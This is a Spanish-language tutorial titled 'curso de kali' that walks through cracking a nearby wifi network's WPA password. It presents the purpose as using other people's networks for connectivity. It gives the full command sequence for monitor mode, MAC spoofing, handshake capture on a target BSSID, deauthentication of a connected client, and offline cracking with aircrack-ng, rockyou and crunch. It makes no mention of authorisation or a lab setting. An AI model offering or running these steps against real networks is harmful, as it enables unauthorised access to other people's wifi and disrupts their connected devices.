curso de kali

hackear wifi con kali linux ?

Hoy en día tenemos la fortuna de tener muchas redes a nuestro alrededor, no necesariamente las podemos usar para no pagar Internet, también podemos hackear una red wifi para usarla como alternativa de conectividad, en caso de que nuestro proveedor de servicios de Internet falle. El proceso es realmente sencillo y los requerimientos es una antena wifi y kali linux instalado. Estos son los pasos a seguir.

1.- Matamos todos los procesos que estén interfiriendo con nuestro dispositivo wifi:
Escribimos este comando:

airmon-ng check kill

Si el comando anterior da algún resultado lo ejecutamos de nuevo quedando así:

Selecci%25C3%25B3n 006

2.- Cambiar nuestra mac (OPCIONAL) asi:

ifconfig

Y sacamos el id de nuestra red

Selecci%25C3%25B3n 001

En este caso wlan0
Detenemos nuestro dispositivo wlan0

ifconfig wlan0 down

Cambiamos la mac de nuestro dispositivo

macchanger -r wlan0
Selecci%25C3%25B3n 002

Colocamos nuestro dispositivo en modo monitor

iwconfig wlan0 mode monitor
Selecci%25C3%25B3n 003

Activamos nuestro dispositivo wlan0

ifconfig wlan0 up

Donde:
wlan0 Niestro dispositivo WIFI (osea mi TPLINK)

3.- Obtenemos la BSSID de la red victima

airodump-ng wlan0
Selecci%25C3%25B3n 004

4.- Nos mantenemos a la escucha de que un cliente se desconecte

Con el comando airodump-ng estamos en escucha de que un cliente se desconecte y se conecte a su modem

airodump-ng -c 6 -w eddy --bssid 00:1D:D3:49:3D:40 wlan0

Donde
6 es el CHANEL
00:1D:D3:49:3D:40 La MAC o BSSID del router

Esperamos a que se muestre en la parte superior de la terminal la palabra handshake y el id del station algo asi

Selecci%25C3%25B3n 007

5.- Sacamos un cliente del modem

Con aireplay-ng sacamos un cliente del modem para que este se conecte automaticamente de nuevo:

aireplay-ng --deauth 10 -a 00:1D:D3:49:3D:40 -c 00:3A:13:06:5D:5D wlan0

Donde:
10 Numero de intentos de desauntentificar a la victima
00:3A:13:06:5D:5D La MAC del cliente conectado que queremos desconectar

6.- Desencriptamos las contraseñas obtenidas.

Con aircrack-ng desencriptamos las contraseñas obtenidas.

aircrack-ng -w '/usr/share/wordlists/rockyou.txt' '/root/eddy-01.cap'

Donde:
rockyou.txt Es un archivo con contraseñas probadas lo puedes descargar de aqui o lo puedes encontrar en “/usr/share/wordlists/rockyou.txt.gz” (hay que descomprimirlo)
eddy-01.cap Es el archivo que se genero con airodump-ng 

7.- Alternativa

Si no funciono con aircrack-ng intentamos con crunch
crunch 10 10 -t %%%%%%%%%% 1234567890 | aircrack-ng -w – /root/eddy-01.cap -e infinitump398

crunch 10 10 -t %%%%%%%%%% 1234567890 | aircrack-ng -w - /root/eddy-01.cap -e infinitump398

Donde:
%%%%%%%%%% 1234567890 Es el tipo de encriptado (solo numeros del 1 al 10)
eddy-01.cap Es el archivo que se genero con airodump-ng 
infinitump398 Nombre de la red victima